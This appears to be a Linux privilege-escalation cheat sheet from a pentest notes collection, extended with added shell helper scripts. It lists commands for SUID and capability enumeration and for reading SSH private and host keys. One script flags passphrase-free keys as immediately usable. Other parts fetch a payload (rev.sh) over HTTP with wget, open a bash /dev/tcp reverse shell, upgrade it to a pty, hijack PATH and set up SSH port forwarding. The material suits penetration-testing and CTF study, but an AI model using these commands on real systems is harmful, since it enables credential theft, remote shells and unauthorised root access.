2.2-Linux-Privilege-Escalation.md


Intrusion phase (Linux)

Privilege Escalation

# find world-writable directories
find / -perm -o=w -type d 2>/dev/null
# find world-executable (traversable) directories
find / -perm -o=x -type d 2>/dev/null
# find development tools and interpreters (quote the glob so the shell does not expand it against the current directory)
find / -name 'perl*' 2>/dev/null
find / -name 'python*' 2>/dev/null
find / -name 'gcc*' 2>/dev/null
# find files with the SUID bit (three equivalent spellings)
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm /4000 -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
# list file capabilities (cap_setuid or cap_dac_read_search on an interpreter is a direct path to root)
getcap -r / 2>/dev/null

SSH key enum

# user keys (identity/identity.pub are the legacy SSH-1 names; also look for id_ecdsa and id_ed25519)
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
# client and daemon configuration
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
# host keys: the private halves are normally readable only by root, so a readable one is a finding in itself
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
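Added example, not from the original page: a small triage script that walks the key file names listed above (plus the ecdsa/ed25519 names) and reports, for each private key the current user can read, whether it is passphrase-protected. It does not need ssh-keygen: OpenSSH-format keys store the cipher name right after the "openssh-key-v1" magic, so the base64 prefix alone tells plain from encrypted. The directory list, file names and status labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original page). Classify SSH private keys that the
# current user can read and say whether they carry a passphrase. Directory list,
# file names and labels are assumptions made for this example.

# key_cipher FILE: print one of pem-encrypted, pem-plain, openssh-encrypted,
# openssh-plain, openssh-unknown, not-a-key, unreadable.
# An OpenSSH-format key begins with the magic "openssh-key-v1\0" followed by the
# cipher name. base64(magic + length + "none") is b3BlbnNzaC1rZXktdjEAAAAABG5vbmU,
# so a key whose first base64 line starts with that string has no passphrase.
key_cipher() {
    f=$1
    [ -r "$f" ] || { echo unreadable; return 1; }
    first=$(head -n 1 "$f")
    case $first in
        "-----BEGIN OPENSSH PRIVATE KEY-----")
            second=$(sed -n '2p' "$f")
            case $second in
                b3BlbnNzaC1rZXktdjEAAAAABG5vbmU*) echo openssh-plain ;;
                b3BlbnNzaC1rZXktdjEA*)             echo openssh-encrypted ;;
                *)                                 echo openssh-unknown ;;
            esac ;;
        "-----BEGIN ENCRYPTED PRIVATE KEY-----")   # PKCS#8, encrypted
            echo pem-encrypted ;;
        "-----BEGIN PRIVATE KEY-----")             # PKCS#8, cleartext
            echo pem-plain ;;
        "-----BEGIN "*" PRIVATE KEY-----")         # traditional RSA/DSA/EC PEM
            if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then
                echo pem-encrypted
            else
                echo pem-plain
            fi ;;
        *) echo not-a-key; return 1 ;;
    esac
}

# ssh_key_triage [DIR...]: print "<status> <path>" for every known key file
# name that exists in DIR (default: ~/.ssh and /etc/ssh).
ssh_key_triage() {
    [ $# -gt 0 ] || set -- "$HOME/.ssh" /etc/ssh
    for dir in "$@"; do
        for name in identity id_rsa id_dsa id_ecdsa id_ed25519 \
                    ssh_host_key ssh_host_rsa_key ssh_host_dsa_key \
                    ssh_host_ecdsa_key ssh_host_ed25519_key; do
            f=$dir/$name
            [ -e "$f" ] || continue
            printf '%s %s\n' "$(key_cipher "$f")" "$f"
        done
    done
}
```

Run ssh_key_triage with no arguments on the target; every line that reads openssh-plain or pem-plain is a key you can use immediately, and every unreadable host key is one to come back for once you have root.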

Can't create or write a file?

Find somewhere writable (top-level directories that contain at least one path the current user can write to; /tmp, /dev/shm and /var/tmp are the usual candidates):

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u

HTTP server

# on the attacking machine: serve the current directory on port 8000
python3 -m http.server
# on the target: fetch the payload
wget http://<my_ip>:8000/rev.sh

Upgrade the pseudo terminal

With a plain reverse shell we lose conveniences such as tab completion and recalling the last command with the up arrow, but more importantly we cannot run anything that prompts for input, e.g. ssh asking for a password or su.

Spawn a new shell inside a pseudo-terminal to make it interactive:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Other ways to get a shell (unlike pty.spawn, these do not allocate a pty):

# from a shell prompt
python3 -c 'import os; os.system("/bin/bash")'
# from inside an interactive Python interpreter (the form the line above was copied from)
import os; os.system('/bin/bash')
/bin/sh -i

Bonus (terminal-aware commands such as clear, and full-screen tools, start working):

export TERM=xterm

Background the shell, switch the attacker's terminal to raw mode so keystrokes such as Ctrl+C reach the target instead of killing the listener, then bring the shell back to the foreground:

# in the attacker's terminal
Ctrl + Z
stty raw -echo; fg

If the display is garbled afterwards, run reset; line wrapping is fixed by setting the target's terminal size (stty rows/columns) to match the local window.
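Added example, not from the original page: the python one-liner above fails on minimal targets that have no Python, so this helper picks the first available pty spawner on the target (python3, python, then util-linux script) and prints the command to run. The fallback order is my assumption; the python command is the page's own, the script form is the util-linux alternative.

```shell
#!/bin/sh
# Added example (not from the original page): pick the first tool on the target
# that can allocate a pty. Order and commands are assumptions made here; the
# python one-liner is the page's, `script -qc` is the util-linux fallback.

# pty_spawn_cmd [SHELL]: print the command to run on the target (default shell
# /bin/bash). Returns 1 when none of python3, python or script is on PATH.
pty_spawn_cmd() {
    shell=${1:-/bin/bash}
    for tool in python3 python script; do
        command -v "$tool" >/dev/null 2>&1 || continue
        case $tool in
            script) printf 'script -qc %s /dev/null\n' "$shell" ;;
            *)      printf '%s -c '\''import pty; pty.spawn("%s")'\''\n' "$tool" "$shell" ;;
        esac
        return 0
    done
    return 1
}

# After running the printed command on the target, finish on the attacker side:
#   Ctrl+Z ; stty raw -echo; fg
# and then on the target: export TERM=xterm; stty rows <rows> columns <cols>
```

The function never prints a perl or sh fallback on purpose: perl -e 'exec "/bin/sh"' and /bin/sh -i give you a shell but not a pty, so su and ssh still refuse to prompt.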

Reverse shell

/bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'


SUID

Sticky bit & SUID & SGID

# Sticky bit (chmod 1000) on a directory - only a file's owner, the directory's owner or root can delete or rename entries (e.g. /tmp)
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) - an executable runs with the file's group, not the caller's; on a directory, new files inherit its group
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) - an executable runs with the file owner's uid, not the caller's
find / -perm -u=s -type f 2>/dev/null
# SGID or SUID - the two tests must be parenthesised: find's -o binds more loosely than the implicit -a, so without the parentheses -type f applies only to the SUID half and SGID directories slip in
find / -type f \( -perm -g=s -o -perm -u=s \) 2>/dev/null
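Added example, not from the original page, serving both the SUID find commands in the enumeration list at the top and this section: it runs the grouped SUID/SGID search once under a root of your choice and then drops the helpers that normally carry the bit on a Debian/Ubuntu-style install, so what remains is what to look at first. The baseline list is an assumption (adjust it to the target distro), and taking the root as an argument is so the functions can be exercised against a test directory.

```shell
#!/bin/sh
# Added example (not from the original page). List SUID/SGID files under ROOT
# and flag the ones not on a baseline of helpers that normally carry the bit.
# The baseline is an assumption (Debian/Ubuntu-style names); adjust per distro.

BASELINE="passwd chsh chfn gpasswd newgrp su sudo mount umount fusermount fusermount3 ping pkexec ssh-keysign unix_chkpwd"

# find_setid ROOT: "mode owner:group path" for every regular file with SUID or
# SGID set. The tests are parenthesised so -type f applies to both halves.
find_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u:%g %p\n' 2>/dev/null | sort -k3
}

# unusual_setid ROOT: same list, minus entries whose basename is in BASELINE.
unusual_setid() {
    find_setid "$1" | while read -r mode ug path; do
        name=${path##*/}
        case " $BASELINE " in
            *" $name "*) ;;                                  # expected helper
            *) printf '%s %s %s\n' "$mode" "$ug" "$path" ;;   # worth a look
        esac
    done
}
```

Run unusual_setid / on the target. For each hit, check whether the binary is in a known shell-escape list, whether it runs helpers by relative name (see the PATH section) and whether any file it reads is writable by you.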


Setting the bits with chmod

# SUID: the executable runs with its owner's uid (chmod 4755 sets the same bit numerically)
chmod u+s <file>
# SGID: the executable runs with its group; on a directory, new entries inherit the directory's group
chmod g+s <file_or_dir>
# the kernel ignores SUID on interpreted scripts, and bash drops an effective uid that differs from the real uid unless started with -p

Capabilities

# cap_setuid on an interpreter lets you call setuid(0) directly; cap_dac_read_search reads any file (e.g. /etc/shadow); cap_sys_admin is close to full root
getcap -r / 2>/dev/null

PATH

# prepend /tmp so that a privileged program which runs a helper by name rather than by absolute path (e.g. system("service apache2 start")) picks up /tmp/service first
export PATH=/tmp:$PATH
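Added example, not from the original page: a self-contained PATH-hijack demonstration. A throwaway "victim" script stands in for a privileged program that runs ls without an absolute path, a planted ls sits in a directory we prepend to PATH, and a "hardened" variant shows the two fixes (pin PATH, call by full path). Everything is created under a temp directory, which is an assumption made so the demo is safe to run anywhere.

```shell
#!/bin/sh
# Added example (not from the original page): PATH hijack, vulnerable and fixed.
# The victim scripts stand in for a SUID binary or root cron job that calls a
# helper by bare name. All paths are created under a temp dir (assumption).

# build_demo: create the planted `ls`, the vulnerable victim and the hardened
# victim, and print the work directory.
build_demo() {
    work=$(mktemp -d)
    mkdir "$work/hijack"
    # planted binary: whatever the attacker wants executed as the victim's euid
    printf '#!/bin/sh\necho HIJACKED: fake ls running as "$(id -un)"\n' > "$work/hijack/ls"
    # vulnerable: trusts whatever PATH the caller hands it
    printf '#!/bin/sh\nls -d /\n' > "$work/victim"
    # hardened: pins PATH to trusted directories and calls the tool by full path
    printf '#!/bin/sh\nPATH=/usr/bin:/bin; export PATH\n/bin/ls -d /\n' > "$work/hardened"
    chmod 755 "$work/hijack/ls" "$work/victim" "$work/hardened"
    printf '%s\n' "$work"
}

# run_with_hijack WORK SCRIPT: run WORK/SCRIPT with the hijack dir first in PATH,
# which is exactly what `export PATH=/tmp:$PATH` does on a real target.
run_with_hijack() {
    PATH="$1/hijack:$PATH" "$1/$2"
}
```

On a real target the victim is a compiled SUID binary (scripts cannot be SUID), so the planted helper usually has to do something durable such as copying a shell and setting the bit on it; also remember that a bash payload has to be started with -p or it drops the effective uid itself.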


SSH port forwarding

Local port

# Browsing to http://127.0.0.1:8080 on your local machine actually reaches http://127.0.0.1:80 on the remote host (192.168.1.7).
ssh -L 8080:127.0.0.1:80 root@192.168.1.7

Remote port

# Anything reaching port 8080 on the remote host is forwarded to http://127.0.0.1:80 on your local machine. By default sshd binds the remote listener to 127.0.0.1 only; other hosts can reach http://192.168.1.7:8080 only if sshd_config has GatewayPorts yes (or clientspecified together with an explicit bind address in -R), and no forwarding works at all with AllowTcpForwarding no.
ssh -R 8080:127.0.0.1:80 root@192.168.1.7
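Added example, not from the original page: before relying on -L or -R, read the two sshd_config settings that decide whether forwarding is allowed at all and who can reach an -R listener. sshd keeps the first occurrence of a keyword, treats keywords case-insensitively and ignores '#' lines; settings inside Match blocks apply only to matching connections, so this helper stops at the first Match line. Whitespace-separated "Keyword value" lines are assumed.

```shell
#!/bin/sh
# Added example (not from the original page): read the sshd_config settings that
# govern -L/-R/-D. Assumes "Keyword value" lines; anything after the first
# Match block is ignored because it applies only to matching connections.

# sshd_opt FILE KEYWORD DEFAULT: effective value of KEYWORD. sshd uses the
# first occurrence, keywords are case-insensitive, '#' starts a comment.
sshd_opt() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v def="$3" '
        /^[[:space:]]*#/ || NF < 2 { next }
        tolower($1) == "match"     { exit }                 # rest is conditional
        tolower($1) == key         { print $2; found = 1; exit }
        END { if (!found) print def }
    ' "$1"
}

# forwarding_policy FILE: one line saying what to expect from -L/-R/-D.
forwarding_policy() {
    tcp=$(sshd_opt "$1" AllowTcpForwarding yes)
    gw=$(sshd_opt "$1" GatewayPorts no)
    case $tcp in
        no) echo "no TCP forwarding: -L/-R/-D refused" ;;
        *)  case $gw in
                yes) echo "tcp-forwarding=$tcp gateway-ports=yes: -R listeners bind all interfaces" ;;
                clientspecified) echo "tcp-forwarding=$tcp gateway-ports=clientspecified: -R <bind>:port:host:port chooses the address" ;;
                *) echo "tcp-forwarding=$tcp gateway-ports=no: -R listeners bind 127.0.0.1 on the server only" ;;
            esac ;;
    esac
}
```

Run forwarding_policy /etc/ssh/sshd_config on the target (or on a copy you pulled with the SSH enumeration above); on a server with gateway-ports=no a remote forward is still useful, but only from processes on that server, e.g. through a second -L hop.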